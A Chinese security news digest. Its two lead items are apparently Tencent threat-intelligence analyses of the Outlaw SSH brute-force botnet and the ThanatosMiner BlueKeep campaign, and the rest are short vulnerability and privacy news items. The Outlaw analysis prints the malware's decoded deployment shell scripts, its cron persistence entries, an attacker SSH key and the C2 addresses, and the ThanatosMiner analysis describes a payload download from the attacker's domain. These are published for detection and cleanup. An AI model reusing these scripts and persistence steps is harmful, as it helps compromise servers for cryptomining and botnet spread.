安全快讯Top News

亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/4_E6kPuodxb3_inVCq2fqg   一、背景 腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。 此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸网络的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,tsm32、tsm64负责继续SSH爆破攻击传播病毒。 亡命徒(Outlaw)僵尸网络之前通过利用Shellshock漏洞进行分发,因此被命名为“ Shellbot”。Shellbot利用物联网(IoT)设备和Linux服务器上的常见命令注入漏洞进行感染。Shellshock漏洞(CVE-2014-7169)是2014年在Bash command shell中发现的一个严重的漏洞,大多数Linux发行版通常会使用到该功能,攻击者可以在这些受影响的Linux服务器上远程执行代码。 亡命徒(Outlaw)僵尸网络利用SSH爆破入侵的攻击活动,可以被腾讯T-Sec高级威胁检测系统(御界)检测到: 腾讯T-Sec云防火墙可以检测亡命徒(Outlaw)僵尸网络的挖矿行为、Shellshock漏洞利用及暴力破解SSH登录口令等等攻击活动。 目前,Outlaw僵尸网络的影响仍在扩散,对企业服务器危害严重,腾讯安全系列产品已采取应急响应措施,执行清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)亡命徒(Outlaw)僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)亡命徒(Outlaw)僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)亡命徒(Outlaw)僵尸网络相关联的IOCs已支持识别检测; 2)云防火墙已支持对亡命徒(Outlaw)僵尸网络所采用挖矿协议的检测拦截、Shellshock漏洞利用检测以及采取SSH暴力破解的检测。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持检测云主机是否存在SSH弱口令,检测外部针对云主机的SSH弱口令爆破行为; 2)已支持查杀亡命徒(Outlaw)僵尸网络相关的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务已支持监测全网资产是否存在SSH弱口令。 2)腾讯漏洞扫描服务已支持检测全网资产是否受Shellshock漏洞CVE-2014-7169(UCS Manager相关)影响。   关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)御界已支持通过协议特征检测亡命徒(Outlaw)僵尸网络的挖矿行为; 2)御界已支持检测SSH弱口令爆破攻击行为; 3)腾讯御界已支持检测Shellshock漏洞CVE-2014-7169、CVE-2014-6271。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀亡命徒(Outlaw)僵尸网络释放的后门木马、挖矿木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 Outlaw通过SSH爆破攻击,访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到,根目录rsync下存放初始化脚本,a目录下存放shellbot后门,b目录下存放挖矿木马,c目录下存放SSH爆破攻击程序。 C目录下二进制文件tsm32、tsm64为SSH(22端口)扫描和爆破程序,并可以通过执行远程命名来下载和执行恶意程序。   爆破成功后执行base64编码的shell命令,主要功能为删除旧版本的恶意程序和目录,然后解压获取到的最新版本恶意程序并执行,内容如下: 命令1: #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1& sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm exit 0 命令2: #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd /tmp/.X25-unix/.rsync/c nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1& sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1& sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1& exit 0 还会通过远程命令修改SSH公钥为: AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 以便之后能更容易入侵。 B目录下run脚本主要内容为base64编码的shellbot后门程序,解码后可以看到代码仍然经过混淆。 把执行函数eval改为print可打印出解密后的代码,是基于Perl的Shellbot变种,连接C2服务器地址为45.9.148.99:443,能够执行多个后门命令,包括文件下载、执行shell cmd和DDoS攻击。如果接受到扫描端口命令,可针对以下端口进行扫描:”21″,”22″,”23″,”25″,”53″,”80″,”110″,”143″,”6665″。 A目录下二进制文件kswapd0为XMRig编译的Linux平台门罗币挖矿木马。 在初始化阶段会执行脚本init0来找到大量Linux平台竞品挖矿木马并进行清除。 在当前用户目录下创建/.configrc目录,拷贝a、b文件夹到该目录下并执行初始化脚本,然后通过写入cron.d安装计划任务进行持久化。写入定时任务如下: 1 1 */2 * * $dir2/a/upd>/dev/null 2>&1 @reboot $dir2/a/upd>/dev/null 2>&1 5 8 * * 0 $dir2/b/sync>/dev/null 2>&1 @reboot $dir2/b/sync>/dev/null 2>&1 0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1 三、安全建议 建议企业Linux服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除: 1、 删除以下文件,杀死对应进程: /tmp/*-unix/.rsync/a/kswapd0 */.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559 /tmp/*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065 /tmp/*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a 2、 检查cron.d中是否存在包含以下内容的定时任务,如有进行删除: /a/upd /b/sync /c/aptitude IOCs IP 45.9.148.99 45.55.57.6 188.166.58.29 104.236.228.46 165.227.45.249 192.241.211.94 188.166.6.130 142.93.34.237 46.101.33.198 149.202.162.73 167.71.155.236 157.245.83.8 45.55.129.23 46.101.113.206 37.139.0.226 159.203.69.48 104.131.189.116 159.203.102.122 159.203.17.176 91.121.51.120 128.199.178.188 208.68.39.124 45.55.210.248 206.81.10.104 5.230.65.21 138.197.230.249 107.170.204.148 Md5 dota3.tar.gz 1a4592f48f8d1bf77895862e877181e0 kswapd0 84945e9ea1950be3e870b798bd7c7559 tsm64 4adb78770e06f8b257f77f555bf28065 tsm32 10ea65f54f719bffcc0ae2cde450cb7a run 716e6b533f836cee5e480a413a84645a URL http[:]//45.55.57.6/dota3.tar.gz http[:]//188.166.58.29/dota3.tar.gz http[:]//104.236.228.46/dota3.tar.gz http[:]//165.227.45.249/dota3.tar.gz http[:]//192.241.211.94/dota3.tar.gz http[:]//188.166.6.130/dota3.tar.gz http[:]//142.93.34.237/dota3.tar.gz http[:]//46.101.33.198/dota3.tar.gz http[:]//149.202.162.73/dota3.tar.gz http[:]//167.71.155.236/dota3.tar.gz http[:]//157.245.83.8/dota3.tar.gz http[:]//45.55.129.23/dota3.tar.gz http[:]//46.101.113.206/dota3.tar.gz http[:]//37.139.0.226/dota3.tar.gz http[:]//159.203.69.48/dota3.tar.gz http[:]//104.131.189.116/dota3.tar.gz http[:]//159.203.102.122/dota3.tar.gz http[:]//159.203.17.176/dota3.tar.gz http[:]//91.121.51.120/dota3.tar.gz http[:]//128.199.178.188/dota3.tar.gz http[:]//208.68.39.124/dota3.tar.gz http[:]//45.55.210.248/dota3.tar.gz http[:]//206.81.10.104/dota3.tar.gz http[:]//5.230.65.21/dota3.tar.gz http[:]//138.197.230.249/dota3.tar.gz http[:]//107.170.204.148/dota3.tar.gz  

英国警方破解 EncroChat 上的加密信息后逮捕 746 名犯罪分子

英国国家打击犯罪局(NCA)宣布,在EncroChat上的信息被截获并解密后,已有746人被捕。据NCA称,被捕者中有一些标志性的犯罪头目,到目前为止,这次行动共缴获5400万英镑、77支枪支、两吨毒品、55辆高价值汽车和73块豪华手表。 在欧洲合作伙伴对加密信使应用EncroChat的解密取得突破后,这场代号为”威尼斯行动”的抓捕成为可能。自2016年以来,英国国家打击犯罪局一直在与世界各地的其他执法机构合作,破解该应用的加密。两个月前,其在法国和荷兰的合作伙伴成功渗透到该平台,并将发现的信息传递给了欧洲刑警组织,得益于这一突破,欧洲执法机构也在各自国家锁定了犯罪分子。 据英国国家打击犯罪局介绍,EncroChat是由犯罪分子在英国以外的地方进行操作的,因此更加难以下手。NCA表示,EncroChat的幕后人员在6月13日意识到该应用被入侵,并向用户发出警告,提醒他们扔掉手机,以降低被捕的可能性。 EncroChat应用通常被加载到经过独特改造的智能手机上,这些手机的价格约为1500英镑,合同期为6个月。这些手机带有即时通讯应用程序,能够拨打VoIP电话以及提供远程数据自毁功能。由于欧洲刑警组织已经截获了这些信息,因此这种安全机制不会帮助使用这些设备的犯罪分子。     (稿源:cnBeta,封面源自网络。)

Facebook 再曝漏洞:与开发者超时分享用户数据

新浪科技讯 北京时间7月2日早间消息,在“剑桥分析丑闻”遭到曝光后,Facebook曾经承诺在与外部开发者分享用户数据时施加时间限制,但实际期限却超出他们当初的承诺。 该公司之前表示,如果用户超过90天未与开发者互动,就将阻止该应用获取用户数据。届时,开发者需要重新获得许可才能再次获得电子邮箱、生日和所在城市等数据的访问权, 但Facebook在周三的博文中表示,这项规定在某些情况下未能顺利实施。如果用户也通过该应用与Facebook好友联系,开发者就可以同时获取这两个用户的数据。但该公司发言人称,这项漏洞却会导致开发者在获得一个活跃用户的数据时,也可以看到该用户好友的数据,即使后者已经超过90天没有打开这款应用。 Facebook透露,这一问题涉及约5000个开发者。但他们并未披露可能受此影响的用户数。 “我们在发现问题后就予以解决。”Facebook在博文中写道,“我们将会继续调查,并将继续围绕任何重大更新保持透明度。” 该漏洞是由一名Facebook工程师两周前发现的,但该公司称,他们没有理由认为相关数据遭到滥用。 Facebook在与第三方分享数据方面有过许多不良记录。这项90天的时间限制就是源自两年多以前的“剑桥分析丑闻”,那家政治数据分析公司当时购买了数百万Facebook用户的数据,但这些数据却是在用户并不知情的情况下收集的。 Facebook当时对许多数据共享产品进行限制,还实施新规,要求用户更加明确地授权外部应用使用其信息。该公司还因为这项丑闻的相关调查在2019年中与美国联邦贸易委员会签订50亿美元的隐私和解协议。(书聿)   (稿源:新浪科技,封面源自网络。)

微软发布紧急安全更新 修复 Windows 10/Server 中的安全漏洞

距离本月的补丁星期二活动日还有大约两周时间,但由于在 Windows 10 以及 Windows Server 中发现了安全漏洞,今天微软发布了两个紧急安全更新。微软表示,这两个漏洞虽然没有公开披露,被黑客利用的可能性较小,但公司等不到7月14日的补丁星期二活动日发布这个更新了。 微软在安全公告中写道:“微软Windows Codecs Library处理内存中对象的方式存在远程代码执行漏洞。成功利用该漏洞的攻击者可以获取信息,进一步危害用户的系统。” 据悉,受影响的 Windows 版本包括 Windows 10 version 1709 Windows 10 version 1803 Windows 10 version 1809 Windows 10 version 1903 Windows 10 version 1909 Windows 10 version 2004 Windows Server 2019 Windows Server version 1803 Windows Server version 1903 Windows Server version 1909 Windows Server version 2004   (稿源:cnBeta,封面源自网络。)

TikTok 欧洲用户隐私保护工作将于7月29日移交给爱尔兰和英国分公司

根据字节跳动本周一发布的新闻稿,为欧洲 TikTok 用户提供隐私保护的责任将转移到爱尔兰和英国的分公司中。在调整后,EEA-Swiss 地区用户的服务提供商将更改为 TikTok Ireland,英国地区也会进行相同调整。 在今天发布的声明中,TikTok 负责欧洲、中东、非洲地区信任和安全的主管 Cormac Keenan,以及负责 EMEA 地区的企业事务总监 Madeline Moncrieff 表示这项调整将于7月29日生效。 在声明中写道: 自 TikTok 推向欧洲以来,我们已经投资于当地人才,创建了一个区域高级领导团队,并在该地区设立了必要的业务职能,因为我们相信这是支持我们在这里不断增长的TikTok社区的最佳方式。 从7月29日起,TikTok的爱尔兰和英国分公司将接替我们的美国 TikTok Inc,为欧洲的用户提供 TikTok,并管理和保护他们的个人数据。 TikTok在欧洲拥有1000多名员工,其中800名员工在英国和爱尔兰工作。伦敦仍然是该公司的主要办事处,是其第二大办事处,在都柏林的信托和安全中心由 Keenan 先生领导。今年1月,该公司表示将在都柏林建立一个新的欧洲基地,雇佣100名员工。 在声明中写道:“随着我们在整个地区的扩张,TikTok爱尔兰已经负责维护用户在欧洲的隐私和安全。我们在都柏林的信任和安全中心使我们能够专注于加强政策、技术和节制策略,以保证我们的社区安全,而我们新的数据隐私团队将专注于维护数据保护的最高标准。这项工作由数据保护官办公室监督,以推动问责制并鼓励隐私意识和合规文化。”   (稿源:cnBeta,封面源自网络。)

开发者为 Linux 添加了一系列 RISC-V UEFI 支持补丁

今年早些时候 Linux 中的 UEFI 代码已经进行过清理,随后一系列 RISC-V UEFI 支持的早期补丁被提出,形成了更为全面的补丁集,用于在 Linux 下启用 RISC-V 的 UEFI 支持。近日则又有开发者提交了一系列补丁,解决了大量问题的同时为 Linux 下支持 RISC-V UEFI 新增了一些新的能力。 开发者 Atish Patra 来自西部数据,他在上周四提交了 11 个补丁,根据他的介绍,补丁 1-6 是准备性修补程序,可修复一些通用的 efi 和 riscv 问题;补丁 7-9 增加了对 RISC-V 的 efi stub 支持,并已在四月份提交审核;补丁 10 重命名了 arm-init,以便可以在不同的代码中使用该基础;补丁 11 则为 RISC-V 添加了运行时服务。 总结起来,这一系列补丁的主要贡献在于: 添加了完整的 ioremap 支持。 添加了 efi 运行时服务支持。 修复了 mm 问题。 目前补丁已在 Qemu 上使用 U-Boot 中的 bootefi 命令进行了验证,在 RISC-V 32 位与 RISC-V 64 位上都通过测试。不过 RISC-V 上 EDK2 代码的某些问题仍在解决中,主要是 SPI 与网络驱动相关的问题。 这一系列补丁打在 Linux 内核 5.8-rc2 上,目前还处于 PR 状态,等待代码审核,如果解决了相关问题,并且最终被接受,那么在 Linux 5.8 发布的时候应该能够看到。     (稿源:开源中国,封面源自网络。)

ThanatosMiner 来了,捕获利用BlueKeep高危漏洞攻击传播的挖矿木马

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/oFnOODmShuuE5OUfbZKiEQ   一、背景 腾讯安全威胁情报中心检测到ThanatosMiner(死神矿工)挖矿木马利用BlueKeep漏洞CVE-2019-0708攻击传播。攻击者将公开的Python版本BlueKeep漏洞利用代码打包生成scan.exe,大范围扫描随机生成的IP地址进行探测和攻击。 漏洞利用成功后执行shellcode下载C#编写的木马svchost.exe,然后利用该木马下载门罗币挖矿木马以及攻击模块进行下一轮攻击。因Payload程序Assembly Name为ThanatosCrypt,将该挖矿木马命名为ThanatosMiner(死神矿工)。 2019年5月15日,微软发布了针对远程桌面服务(Remote Desktop Services )的关键远程执行代码漏洞CVE-2019-0708的安全更新,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作——意味着,存在漏洞的电脑只需要连网,勿须任何操作即可能遭遇远程黑客攻击而沦陷。BlueKeep漏洞(CVE-2019-0708)是所有安全厂商高度重视的高危漏洞。 该漏洞影响旧版本的Windows系统,包括: Windows 7、WindowsServer 2008 R2、Windows Server 2008、Windows 2003、Windows XP。Windows 8和Windows10及之后版本不受此漏洞影响。 腾讯安全系列产品已全面支持对ThanatosMiner(死神矿工)挖矿木马的查杀拦截,腾讯安全专家强烈建议用户及时修补BlueKeep漏洞,避免电脑被挖矿木马自动扫描攻击后完全控制。 二、样本分析 攻击模块scan.exe通过pyinstaller打包Python代码生成exe,使用pyinstxtractor.py可解压出Python编译后的无后缀文件scan。pyinstaller在打包pyc的时候会去掉pyc的magic和时间戳,而打包的系统库文件中这两项内容会被保留,所以可以查看解压出的系统库中的magic和时间戳并添加到scan的文件头,然后将其命名为scan.pyc,并通过uncompyle6进行反编译,可以还原的Python代码scan.py。 分析发现,Python3版本编译后的二进制文件开头为e3 00 00 00 00 00 00 00,Python2版本通常为63 00 00 00 00 00 00 00。 scan.py获取本机同网段IP地址,以及随机生成的外网IP地址扫描3389端口。 利用公开的BlueKeep漏洞CVE-2019-0708攻击代码进行攻击。 漏洞攻击成功执行shellcode命令,在%Temp%目录下创建DO.vbs,下载执行http[:]//download.loginserv.net/svchost.exe。 Payload木马svchost.exe采样C#编写,代码经过Dotfuscator混淆处理,可使用开源工具De4dot去除部分混淆,程序的Assembly Name为ThanatosCrypt。 运行后会检测以下注册表项和磁盘文件判断是否在虚拟机中运行。 SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers SOFTWARE\VMWare, Inc.\VMWare Tools SOFTWARE\Oracle\VirtualBox Guest Additions C:\windows\Sysnative\Drivers\Vmmouse.sys C:\windows\Sysnative\Drivers\vmci.sys C:\windows\Sysnative\Drivers\vmusbmouse.sys C:\windows\Sysnative\VBoxControl.exe 通过IsDebuggerPresent() 、IsDebuggerAttached()、CheckRemoteDebuggerPresent()判断进程是否被调试。 若无虚拟机环境、未处于被调试状态则继续执行。 然后svchost.exe继续下载http[:]//download.loginserv.net/scan.exe进行扫描攻击,以及下载http[:]//download.loginserv.net/xmrig.exe挖矿门罗币。 IOCs Domain download.loginserv.net MD5 URL http[:]//download.loginserv.net/svchost.exe http[:]//download.loginserv.net/xmrig.exe http[:]//download.loginserv.net/scan.exe http[:]//download.loginserv.net/mine.exe   参考链接 1.Windows远程桌面服务漏洞预警(CVE-2019-0708) https://mp.weixin.qq.com/s/aTSC0YR1dxSUHVJ3pnZezA 2.漏洞预警更新:Windows RDS漏洞(CVE-2019-0708) https://mp.weixin.qq.com/s/OEjI776O3cTjtMrsPdtnpQ 3.Windows远程桌面漏洞风险逼近,腾讯安全提供全面扫描修复方案 https://mp.weixin.qq.com/s/ckVHic2oChjZmVvH_zmsHA 4.Windows远程桌面服务漏洞(CVE-2019-0708)攻击代码现身 https://mp.weixin.qq.com/s/bcANAbzONFyrxqNMssTiLg 5.RDP漏洞(BlueKeep)野外利用预警,腾讯御知免费检测 https://mp.weixin.qq.com/s/G2ZS7rKkYYvEtbxUm0odGA 6.永恒之蓝下载器木马再升级,集成BlueKeep漏洞攻击能力 https://mp.weixin.qq.com/s/_teIut43g6In9YZ7VQ2f7w

WastedLocker:赛门铁克确定了针对美国组织的攻击浪潮

Broadcom旗下的赛门铁克发现并警告用户:攻击者试图部署WastedLocker勒索软件,对美国公司进行了一系列攻击。这些攻击的最终目标是通过对受害者的大多数计算机和服务器进行加密来削弱受害者的IT基础架构,以要求获得数百万美元的赎金,目前至少有31个组织受到了攻击,这意味着攻击者已经破坏了目标组织的网络,并且正在为勒索软件攻击奠定基础。 是一种相对较新的定向勒索软件,在NCC Group发布之前就已被记录,而赛门铁克正在对受影响的网络进行扩展。WastedLocker被归因于臭名昭著的“Evil Corp”网络犯罪组织,Evil Corp曾与Dridex银行木马和BitPaymer勒索软件相关联,勒索金额高达数千万美元。两名涉嫌参与该组织的俄罗斯男子在美国对他们进行了公开起诉。 这些攻击始于一个名为SocGholish的基于javascript的恶意框架,该框架被追踪到超过150个受到威胁的网站伪装成软件进行更新。一旦攻击者进入了受害者的网络,他们就会使用Cobalt Strike恶意软件和一些非本土工具来盗取身份证件,升级特权,然后在网络中进行移动,以便在多台电脑上部署WastedLocker勒索软件。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1248/     消息来源:symantec-enterprise-blogs,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

Dubbo 反序列化漏洞,可导致远程代码执行

近日 Dubbo 官方报告了一个 Dubbo 远程代码执行问题(CVE-2020-1948),该问题由 Provider 反序列化漏洞引起。根据介绍,攻击者可以使用无法识别的服务名称或方法名称,并带上一些恶意参数有效载荷发送 RPC 请求。当恶意参数反序列化后,将执行一些恶意代码。 受影响的版本: 2.7.0 <= Dubbo Version <= 2.7.6 2.6.0 <= Dubbo Version <= 2.6.7 所有 2.5.x 版本(官方团队不再支持) 所有 Dubbo 版本都可以升级到 2.7.7 或更高版本,避免该漏洞:https://github.com/apache/dubbo/releases/tag/dubbo-2.7.7 详情查看邮件列表。     (稿源:开源中国,封面源自网络。)

Apache Tomcat HTTP/2 DoS 漏洞 影响多个版本

Apache Tomcat 安全团队报告了一个 Tomcat HTTP/2 DoS 漏洞。 HTTP/2 请求的特制序列可能会在数秒内引发较高的 CPU 使用率,如果有足够数量的此类请求在并发 HTTP/2 连接上进行连接时,服务器可能无响应,即造成拒绝服务。 该漏洞严重等级定为“重大”(Important),编号 CVE-2020-11996。 受影响的软件版本包括: Apache Tomcat 10.0.0-M1 到 10.0.0-M5 Apache Tomcat 9.0.0.M1 到 9.0.35 Apache Tomcat 8.5.0 到 8.5.55 官方给出的缓解方法: 升级到 Apache Tomcat 10.0.0-M6 或更高版本 升级到 Apache Tomcat 9.0.36 或更高版本 升级到 Apache Tomcat 8.5.56 或更高版本 具体细节可以查看: http://tomcat.apache.org/security-10.html http://tomcat.apache.org/security-9.html http://tomcat.apache.org/security-8.html     (稿源:开源中国,封面源自网络。)